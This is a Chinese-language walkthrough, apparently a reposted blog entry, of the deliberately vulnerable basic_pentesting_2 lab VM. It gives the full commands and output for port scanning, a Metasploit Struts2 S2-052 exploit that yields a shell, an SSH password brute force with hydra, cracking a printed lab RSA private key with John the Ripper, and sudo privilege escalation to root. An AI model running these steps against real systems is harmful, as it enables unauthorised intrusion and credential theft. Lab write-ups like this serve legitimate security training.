靶机:basic_pentesting_2
靶机目标IP:192.168.31.22
IcMl0x824
Yakit-信息收集-漏洞检测
端口/指纹扫描-[1]
主机地址 指纹
192.168.31.22:8009 ajp13
192.168.31.22:8080 http/tomcat[9.0.7]
192.168.31.22:139 netbios-ssn/samba
192.168.31.22:445 netbios-ssn/samba
192.168.31.22:22 linux_kernel/openssh[7.2p2]/ssh/ubuntu_linux
192.168.31.22:80 apache[2.4.18]/http/http_server[2.4.18]/ubuntu_linux
综合目录扫描与爆破-[2]
[11:01:15] 200 - 1KB -/development/
[11:01:19] 200 - 158B -/index.html
插件/漏洞与风险扫描-[3]
附带者Yakit的所有插件,先扫一顿看看,然后再根据专项点扫一下。
![操蛋人生系列-[每日一靶机]:多元坑爹靶场下的思路决定打靶方向:basic_pentesting_2](http://cn-sec.com/wp-content/uploads/2022/12/1-1671341511.png "操蛋人生系列-[每日一靶机]:多元坑爹靶场下的思路决定打靶方向:basic_pentesting_2")
扫完发现,还是蛮多的
高危
| CVE-2020-1938 Apache Tomcat AJP 文件读取与包含漏洞 | RCE[TOMCAT]
| Web 目录爆破[Tomcat 后台泄露]: /manager/html
中危
| http://192.168.31.22:8080/docs/realm-howto.html存在敏感信息泄露
| 疑似后台或登陆页: 192.168.31.22:8080
| Web 目录爆破[Tomcat 测试用例泄漏]: /examples/
信息泄露
| Tomcat默认页面: http://192.168.31.22:8080
| Apache Tomcat: http://192.168.31.22:8080
专项漏洞检测-[4]
已知Tomcat,先测一下,看来自带的插件并没有扫出有价值的
还得是nuclei的poc扫出来的一个
CVE-2020-1938 Apache Tomcat AJP 文件读取与包含漏洞
详细漏洞解析与复现:
https://zhuanlan.zhihu.com/p/137527937
该漏洞造成RCE的条件是:
在webapps目录下上传文件(可以是任意文件)
随后通过该文件包含漏洞,造成RCE
实现文件包含RCE构造难度大
先借助MSF中EXP进行先行攻击试试看
msf6 auxiliary(admin/http/tomcat_ghostcat) > run
[*] Running module against 192.168.31.22
Status Code: 200
Accept-Ranges: bytes
ETag: W/"1227-1522785376000"
Last-Modified: Tue, 03 Apr 2018 19:56:16 GMT
Content-Type: application/xml
Content-Length: 1227
<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0"
metadata-complete="true">
<display-name>Welcome to Tomcat</display-name>
<description>
Welcome to Tomcat
</description>
</web-app>
[+] 192.168.31.22:8080 - /root/.msf4/loot/20221217122115_default_192.168.31.22_WEBINFweb.xml_421403.txt
[*] Auxiliary module execution completed
可以看出辅助模块auxiliary/admin/http/tomcat_ghostcat, 仅仅只能做到读取,但是包含恕我直言真的可能得不偿失。
如果真想拿这个搞,可以去Github上搜一下有没有大佬写好的利用EXP去试着瞄一下
综合收集分析信息-[5]
还记得之前在用Dirsearch扫出来的/development/目录下发现了两个提示文本
![操蛋人生系列-[每日一靶机]:多元坑爹靶场下的思路决定打靶方向:basic_pentesting_2](http://cn-sec.com/wp-content/uploads/2022/12/6-1671341513.png "操蛋人生系列-[每日一靶机]:多元坑爹靶场下的思路决定打靶方向:basic_pentesting_2")
-
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat to host that on this server too. Haven't made any real web apps yet, but I have tried that example you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm using version 2.5.12, because other versions were giving me trouble. -K
-
2018-04-22: SMB has been configured. -K
-
2018-04-21: I got Apache set up. Will put in our content later. -J
2018-04-23:我一直在捣鬼struts的东西,它非常酷!我觉得它可能很整洁把它也托管在这个服务器上。还没有做过任何真正的web应用,但我已经尝试过那个例子了你可以展示它是如何工作的(这是示例的其余版本!)。哦,现在我使用2.5.12版本,因为其他版本给我带来了麻烦。- k
2018-04-22:已配置SMB。- k
2018-04-21:我安装了Apache。将稍后放在我们的内容中。- j
-
For J:
-
I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,and I was able to crack your hash really easily. You know our password policy, so please followit? Change that password ASAP.
-
-K
J:
我一直在审计/etc/shadow的内容,以确保我们没有任何弱凭据,我很容易就破解了你的大麻。你知道我们的密码政策,所以请遵守它吗?请尽快修改密码。
- k
仔细分析求方向-[6]
-
tomcat弱口令爆破试一下
-
/etc/shadow存在弱口令,可尝试使用工具去爆破
-
他最近一直在弄一个struts的东西?去搜索 struts REST version 2.5.12 相关漏洞去利用
-
139和445端口运行的samba服务,可以使用enum4linux工具枚举Windows和samba中的数据
-
CVE-2020-1938 Apache-Tomcat-Ajp 文件包含漏洞 这个这能去读取目录WEB-INF下web.xml(应该对后续没啥用)
看来只有两条路:
-
通过struts REST version 2.5.12 相关漏洞的利用拿下一个低权限tomcat用户的shell,然后走一步看一步
-
使用enum4linux 去扫描共享文件,看看能不能套到用户信息,要是能就可以爆破它,然后登陆走一步看
工具-漏洞利用-提升权限
tomcat弱口令爆破
![操蛋人生系列-[每日一靶机]:多元坑爹靶场下的思路决定打靶方向:basic_pentesting_2](http://cn-sec.com/wp-content/uploads/2022/12/1-1671341514.png "操蛋人生系列-[每日一靶机]:多元坑爹靶场下的思路决定打靶方向:basic_pentesting_2")
实际测试并不能登陆成功,页面跳401,算了滚他妈比
CVE-2017-9805/S2-052+MSF利用
2017年9月5日,Apache Struts发布最新安全公告,Apache Struts2的REST插件存在远程代码执行的高危漏洞,该漏洞由http://lgtm.com的安全研究员汇报,漏洞编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。
通过搜索struts REST version 2.5.12后,发现与它相应的漏洞是S2-052
先尝试一下有没有这个路径
http://192.168.31.22:8080/struts2-rest-showcase-2.5.12/orders.xhtml
看到内容后,说明存在漏洞
注意:
-
网络上的搜到的复现教程,路径都是
/struts2-rest-showcase -
而这个靶机的路径后面多了个-2.5.12
-
因为我在用MSF的EXP打的时候,我就去访问看看他这个鸡巴路径老是不对
-
然后我结合去猜路径,然后想起还有个版本号,尝试性的加进去发现成功
其实之前打算利用一些工具EXP去直接秒
![操蛋人生系列-[每日一靶机]:多元坑爹靶场下的思路决定打靶方向:basic_pentesting_2](http://cn-sec.com/wp-content/uploads/2022/12/8-1671341516.png "操蛋人生系列-[每日一靶机]:多元坑爹靶场下的思路决定打靶方向:basic_pentesting_2")
发现他们把S2-052这个洞基本在工具集里废弃了,然后看MSF里有,也很老了,就直接用好了。
msf6 > search S2-052
msf6 > use
msf6 exploit(multi/http/struts2_rest_xstream) > show options
msf6 exploit(multi/http/struts2_rest_xstream) > set rhosts 192.168.31.2
msf6 exploit(multi/http/struts2_rest_xstream) > set TARGETURI /struts2-rest-showcase-2.5.12/orders.xhtml
msf6 exploit(multi/http/struts2_rest_xstream) > run
meterpreter > shell
Process 1309 created.
Channel 1 created.
python -c 'import pty;pty.spawn("/bin/bash")'
tomcat9@basic2:/$
拿下一个低权限tomcat用户的shell,就可以仔细的看看,当前能获取到什么
-
因为权限太低,所以进入不了root目录
tomcat9@basic2:/$ cd /root
cd /root
bash: cd: /root: Permission denied -
看桌面有几个用户,进入用户kay的目录后,看到了
pass.bak文件tomcat9@basic2:/home/jan$ cd /home/kay
cd /home/kay
tomcat9@basic2:/home/kay$ ls
ls
pass.bak -
发现cat没权限?用vim只读就行
密码:heresareallystrongpasswordthatfollowsthepasswordpolicy$$
SSH+VIM只读切换用户SUDO提权
用拿到的kay用户登陆
┌──(root㉿kali)-[~]
└─# ssh [email protected]
The authenticity of host '192.168.31.22 (192.168.31.22)' can't be established.
ED25519 key fingerprint is SHA256:XKjDkLKocbzjCch0Tpriw1PeLPuzDufTGZa4xMDA+o4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.31.22' (ED25519) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
282 packages can be updated.
201 updates are security updates.
Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$
老样子
kay@basic2:~$ ls -al
total 48
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 kay kay 756 Apr 23 2018 .bash_history
-rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout
-rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc
drwx------ 2 kay kay 4096 Apr 17 2018 .cache
-rw------- 1 root kay 119 Apr 23 2018 .lesshst
drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano
-rw------- 1 kay kay 57 Apr 23 2018 pass.bak
-rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh
-rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful
-rw------- 1 root kay 538 Apr 23 2018 .viminfo
![操蛋人生系列-[每日一靶机]:多元坑爹靶场下的思路决定打靶方向:basic_pentesting_2](http://cn-sec.com/wp-content/uploads/2022/12/3-1671341517.png "操蛋人生系列-[每日一靶机]:多元坑爹靶场下的思路决定打靶方向:basic_pentesting_2")
可以看到目录有个.sudo_as_admin_successful的文件,说明可以直接用自己的密码切换到root用户
OK,拿下!
kay@basic2:~$ sudo su
root@basic2:/home/kay# whoami
root
root@basic2:/home/kay# cd /root
root@basic2:~# ls
flag.txt
root@basic2:~# cat flag.txt
Congratulations! You've completed this challenge. There are two ways (that I'm aware of) to gain
a shell, and two ways to privesc. I encourage you to find them all!
If you're in the target audience (newcomers to pentesting), I hope you learned something. A few
takeaways from this challenge should be that every little bit of information you can find can be
valuable, but sometimes you'll need to find several different pieces of information and combine
them to make them useful. Enumeration is key! Also, sometimes it's not as easy as just finding
an obviously outdated, vulnerable service right away with a port scan (unlike the first entry
in this series). Usually you'll have to dig deeper to find things that aren't as obvious, and
therefore might've been overlooked by administrators.
Thanks for taking the time to solve this VM. If you choose to create a writeup, I hope you'll send
me a link! I can be reached at josiah@vt.edu. If you've got questions or feedback, please reach
out to me.
Happy hacking!
enum4linux 枚举共享文件
我们还是开拓一下视线,试试这个方向能否成功呢?
使用方法:enum4linux 192.168.31.22
Windows 访问共享文件:
\ip文件夹名称
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Dec 17 22:42:35 2022
======( Target Information)=======
Target ........... 192.168.31.22
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
==( Enumerating Workgroup/Domain on 192.168.31.22 )===
[+] Got domain/workgroup name: WORKGROUP
=======( Nbtstat Information for 192.168.31.22 )=====
Looking up status of 192.168.31.22
BASIC2 <00> - B <ACTIVE> Workstation Service
BASIC2 <03> - B <ACTIVE> Messenger Service
BASIC2 <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
===( Session Check on 192.168.31.22 )===
[+] Server 192.168.31.22 allows sessions using username '', password ''
=======( Getting domain SID for 192.168.31.22 )========
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
========( OS information on 192.168.31.22 )=========
[E] Can't get OS info with smbclient
[+] Got OS info for 192.168.31.22 from srvinfo:
BASIC2 Wk Sv PrQ Unx NT SNT Samba Server 4.3.11-Ubuntu
platform_id : 500
os version : 6.1
server type : 0x809a03
======( Users on 192.168.31.22 )===========
Use of uninitialized value $users in print at ./enum4linux.pl line 972.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.
Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.==========( Share Enumeration on 192.168.31.22 )==============
Sharename Type Comment
--------- ---- -------
Anonymous Disk
IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP BASIC2
[+] Attempting to map shares on 192.168.31.22
//192.168.31.22/Anonymous Mapping: OK Listing: OK Writing: N/A
[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing *
//192.168.31.22/IPC$ Mapping: N/A Listing: N/A Writing: N/A
=========( Password Policy Information for 192.168.31.22 )=========
[+] Attaching to 192.168.31.22 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] BASIC2
[+] Builtin
[+] Password Info for Domain: BASIC2
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
========( Groups on 192.168.31.22 )==============
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
==( Users on 192.168.31.22 via RID cycling (RIDS: 500-550,1000-1050) )==
[I] Found new SID:
S-1-22-1
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTINAdministrators (Local Group)
S-1-5-32-545 BUILTINUsers (Local Group)
S-1-5-32-546 BUILTINGuests (Local Group)
S-1-5-32-547 BUILTINPower Users (Local Group)
S-1-5-32-548 BUILTINAccount Operators (Local Group)
S-1-5-32-549 BUILTINServer Operators (Local Group)
S-1-5-32-550 BUILTINPrint Operators (Local Group)
[+] Enumerating users using SID S-1-5-21-2853212168-2008227510-3551253869 and logon username '', password ''
S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2nobody (Local User)
S-1-5-21-2853212168-2008227510-3551253869-513 BASIC2None (Domain Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix Userkay (Local User)
S-1-22-1-1001 Unix Userjan (Local User)
=====( Getting printer info for 192.168.31.22 )=======
No printers returned.
enum4linux complete on Sat Dec 17 22:42:44 2022
看的我有点懵..................提取下信息吧
存在两个用户
S-1-22-1-1000 Unix Userkay (Local User) S-1-22-1-1001 Unix Userjan (Local User)
基本我也载看不出来啥子玩意了,接下来的目的就很明确:
尝试去爆破这俩用户,我们就拿jan开🔪试试
hydra爆破SSH密码
/usr/share/wordlists/rockyou.txt这个字典挺大的,emmmm
hydra -l jan -P /usr/share/wordlists/rockyou.txt 192.168.31.22 ssh
![操蛋人生系列-[每日一靶机]:多元坑爹靶场下的思路决定打靶方向:basic_pentesting_2](http://cn-sec.com/wp-content/uploads/2022/12/0-1671341518.png "操蛋人生系列-[每日一靶机]:多元坑爹靶场下的思路决定打靶方向:basic_pentesting_2")
得到密码 armando 用户 jan
SSH+VIM只读切换用户SUDO提权
![操蛋人生系列-[每日一靶机]:多元坑爹靶场下的思路决定打靶方向:basic_pentesting_2](http://cn-sec.com/wp-content/uploads/2022/12/10-1671341520.png "操蛋人生系列-[每日一靶机]:多元坑爹靶场下的思路决定打靶方向:basic_pentesting_2")
实际上到这一步操作差不多
find /-perm -4000 2>/dev/null
可以看到/usr/bin/vim.basic 设置了 SUID
这意味着如果我们以非特权用户身份运行 vim 编辑器,我们将能够读取和写入各种敏感和关键文件。
使用 vim 去读取 pass.bak 文件,然后以kay用户登录sudo提权即可。
jan@basic2:/home/kay$ sudo -l
[sudo] password for jan:
Sorry, user jan may not run sudo on basic2.
值得注意的一点是jan用户是没有sudo权限的
SSH公钥私钥获取身份登录凭据
注意看,在隐藏目录/home/kay/.ssh下,是有ssh的公钥和私钥信息的,这一个点容易被忽略
![操蛋人生系列-[每日一靶机]:多元坑爹靶场下的思路决定打靶方向:basic_pentesting_2](http://cn-sec.com/wp-content/uploads/2022/12/5-1671341521.png "操蛋人生系列-[每日一靶机]:多元坑爹靶场下的思路决定打靶方向:basic_pentesting_2")
jan@basic2:/home/kay$ cd .ssh/
jan@basic2:/home/kay/.ssh$ ls
authorized_keys id_rsa id_rsa.pub
jan@basic2:/home/kay/.ssh$ cat at id_rsa
cat: at: No such file or directory
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75
IoNb/J0q2Pd56EZ23oAaJxLvhuSZ1crRr4ONGUAnKcRxg3+9vn6xcujpzUDuUtlZ
o9dyIEJB4wUZTueBPsmb487RdFVkTOVQrVHty1K2aLy2Lka2Cnfjz8Llv+FMadsN
XRvjw/HRiGcXPY8B7nsA1eiPYrPZHIH3QOFIYlSPMYv79RC65i6frkDSvxXzbdfX
AkAN+3T5FU49AEVKBJtZnLTEBw31mxjv0lLXAqIaX5QfeXMacIQOUWCHATlpVXmN
lG4BaG7cVXs1AmPieflx7uN4RuB9NZS4Zp0lplbCb4UEawX0Tt+VKd6kzh+Bk0aU
hWQJCdnb/U+dRasu3oxqyklKU2dPseU7rlvPAqa6y+ogK/woTbnTrkRngKqLQxMl
lIWZye4yrLETfc275hzVVYh6FkLgtOfaly0bMqGIrM+eWVoXOrZPBlv8iyNTDdDE
3jRjqbOGlPs01hAWKIRxUPaEr18lcZ+OlY00Vw2oNL2xKUgtQpV2jwH04yGdXbfJ
LYWlXxnJJpVMhKC6a75pe4ZVxfmMt0QcK4oKO1aRGMqLFNwaPxJYV6HauUoVExN7
bUpo+eLYVs5mo5tbpWDhi0NRfnGP1t6bn7Tvb77ACayGzHdLpIAqZmv/0hwRTnrb
RVhY1CUf7xGNmbmzYHzNEwMppE2i8mFSaVFCJEC3cDgn5TvQUXfh6CJJRVrhdxVy
VqVjsot+CzF7mbWm5nFsTPPlOnndC6JmrUEUjeIbLzBcW6bX5s+b95eFeceWMmVe
B0WhqnPtDtVtg3sFdjxp0hgGXqK4bAMBnM4chFcK7RpvCRjsKyWYVEDJMYvc87Z0
ysvOpVn9WnFOUdON+U4pYP6PmNU4Zd2QekNIWYEXZIZMyypuGCFdA0SARf6/kKwG
oHOACCK3ihAQKKbO+SflgXBaHXb6k0ocMQAWIOxYJunPKN8bzzlQLJs1JrZXibhl
VaPeV7X25NaUyu5u4bgtFhb/f8aBKbel4XlWR+4HxbotpJx6RVByEPZ/kViOq3S1
GpwHSRZon320xA4hOPkcG66JDyHlS6B328uViI6Da6frYiOnA4TEjJTPO5RpcSEK
QKIg65gICbpcWj1U4I9mEHZeHc0r2lyufZbnfYUr0qCVo8+mS8X75seeoNz8auQL
4DI4IXITq5saCHP4y/ntmz1A3Q0FNjZXAqdFK/hTAdhMQ5diGXnNw3tbmD8wGveG
VfNSaExXeZA39jOgm3VboN6cAXpz124Kj0bEwzxCBzWKi0CPHFLYuMoDeLqP/NIk
oSXloJc8aZemIl5RAH5gDCLT4k67wei9j/JQ6zLUT0vSmLono1IiFdsMO4nUnyJ3
z+3XTDtZoUl5NiY4JjCPLhTNNjAlqnpcOaqad7gV3RD/asml2L2kB0UT8PrTtt+S
baXKPFH0dHmownGmDatJP+eMrc6S896+HAXvcvPxlKNtI7+jsNTwuPBCNtSFvo19
l9+xxd55YTVo1Y8RMwjopzx7h8oRt7U+Y9N/BVtbt+XzmYLnu+3qOq4W2qOynM2P
nZjVPpeh+8DBoucB5bfXsiSkNxNYsCED4lspxUE4uMS3yXBpZ/44SyY8KEzrAzaI
fn2nnjwQ1U2FaJwNtMN5OIshONDEABf9Ilaq46LSGpMRahNNXwzozh+/LGFQmGjI
I/zN/2KspUeW/5mqWwvFiK8QU38m7M+mli5ZX76snfJE9suva3ehHP2AeN5hWDMw
X+CuDSIXPo10RDX+OmmoExMQn5xc3LVtZ1RKNqono7fA21CzuCmXI2j/LtmYwZEL
OScgwNTLqpB6SfLDj5cFA5cdZLaXL1t7XDRzWggSnCt+6CxszEndyUOlri9EZ8XX
oHhZ45rgACPHcdWcrKCBfOQS01hJq9nSJe2W403lJmsx/U3YLauUaVgrHkFoejnx
CNpUtuhHcVQssR9cUi5it5toZ+iiDfLoyb+f82Y0wN5Tb6PTd/onVDtskIlfE731
DwOy3Zfl0l1FL6ag0iVwTrPBl1GGQoXf4wMbwv9bDF0Zp/6uatViV1dHeqPD8Otj
Vxfx9bkDezp2Ql2yohUeKBDu+7dYU9k5Ng0SQAk7JJeokD7/m5i8cFwq/g5VQa8r
sGsOxQ5Mr3mKf1n/w6PnBWXYh7n2lL36ZNFacO1V6szMaa8/489apbbjpxhutQNu
Eu/lP8xQlxmmpvPsDACMtqA1IpoVl9m+a+sTRE2EyT8hZIRMiuaaoTZIV4CHuY6Q
3QP52kfZzjBt3ciN2AmYv205ENIJvrsacPi3PZRNlJsbGxmxOkVXdvPC5mR/pnIv
wrrVsgJQJoTpFRShHjQ3qSoJ/r/8/D1VCVtD4UsFZ+j1y9kXKLaT/oK491zK8nwG
URUvqvBhDS7cq8C5rFGJUYD79guGh3He5Y7bl+mdXKNZLMlzOnauC5bKV4i+Yuj7
AGIExXRIJXlwF4G0bsl5vbydM55XlnBRyof62ucYS9ecrAr4NGMggcXfYYncxMyK
AXDKwSwwwf/yHEwX8ggTESv5Ad+BxdeMoiAk8c1Yy1tzwdaMZSnOSyHXuVlB4Jn5
phQL3R8OrZETsuXxfDVKrPeaOKEE1vhEVZQXVSOHGCuiDYkCA6al6WYdI9i2+uNR
ogjvVVBVVZIBH+w5YJhYtrInQ7DMqAyX1YB2pmC+leRgF3yrP9a2kLAaDk9dBQcV
ev6cTcfzhBhyVqml1WqwDUZtROTwfl80jo8QDlq+HE0bvCB/o2FxQKYEtgfH4/UC
D5qrsHAK15DnhH4IXrIkPlA799CXrhWi7mF5Ji41F3O7iAEjwKh6Q/YjgPvgj8LG
OsCP/iugxt7u+91J7qov/RBTrO7GeyX5Lc/SW1j6T6sjKEga8m9fS10h4TErePkT
t/CCVLBkM22Ewao8glguHN5VtaNH0mTLnpjfNLVJCDHl0hKzi3zZmdrxhql+/WJQ
4eaCAHk1hUL3eseN3ZpQWRnDGAAPxH+LgPyE8Sz1it8aPuP8gZABUFjBbEFMwNYB
e5ofsDLuIOhCVzsw/DIUrF+4liQ3R36Bu2R5+kmPFIkkeW1tYWIY7CpfoJSd74VC
3Jt1/ZW3XCb76R75sG5h6Q4N8gu5c/M0cdq16H9MHwpdin9OZTqO2zNxFvpuXthY
-----END RSA PRIVATE KEY-----
从图片中您可以看出该文件包含一个 RSA 密钥,这可能是 kay 的密码
复制 RSA 密钥并在桌面上创建了一个新文件key,然后将密钥粘贴到该文件中
使用 ssh2john 将密钥转换为 John the Ripper 的可破解文件
用命令
ssh2john key > sshkey
或
python /usr/share/john/ssh2john.py key > sshkey
![操蛋人生系列-[每日一靶机]:多元坑爹靶场下的思路决定打靶方向:basic_pentesting_2](http://cn-sec.com/wp-content/uploads/2022/12/10-1671341523.png "操蛋人生系列-[每日一靶机]:多元坑爹靶场下的思路决定打靶方向:basic_pentesting_2")
破解密钥就可以了
john sshkey
John破解得到密钥是beeswax,现在有了以 kay 身份登录的凭据
![操蛋人生系列-[每日一靶机]:多元坑爹靶场下的思路决定打靶方向:basic_pentesting_2](http://cn-sec.com/wp-content/uploads/2022/12/2-1671341525.png "操蛋人生系列-[每日一靶机]:多元坑爹靶场下的思路决定打靶方向:basic_pentesting_2")
必须以 jan 的身份回到包含 RSA 密钥的文件夹,然后使用以下命令将用户切换到 kay
ssh -i id_rsa [email protected]
jan@basic2:/home/kay/.ssh$ ssh -i id_rsa [email protected]
Could not create directory '/home/jan/.ssh'.
The authenticity of host '192.168.31.22 (192.168.31.22)' can't be established.
ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/jan/.ssh/known_hosts).
Enter passphrase for key 'id_rsa': beeswax
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
282 packages can be updated.
201 updates are security updates.
New release '18.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Sat Dec 17 22:37:04 2022 from 192.168.31.19
kay@basic2:~$
好了,到此为止吧,操作还是一致的。
补充一点:
之前是必须以 jan 的身份回到包含 RSA 密钥的文件夹,然后把用户切换到 kay
其实也可以不回到 jan 包含 RSA 密钥的文件夹下,直接
chmod 700 key
将私钥文件设置为可以使用的权限,之后
ssh -i key [email protected]
连接就行
总结-打靶心得-基尼抬眉
这篇靶机属于普通难度吧,坑是真有点多,还是那句话
信息收集的深度决定了漏洞挖掘和利用的广度
原文始发于微信公众号(猫因的安全):操蛋人生系列-[每日一靶机]:多元坑爹靶场下的思路决定打靶方向:basic_pentesting_2
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论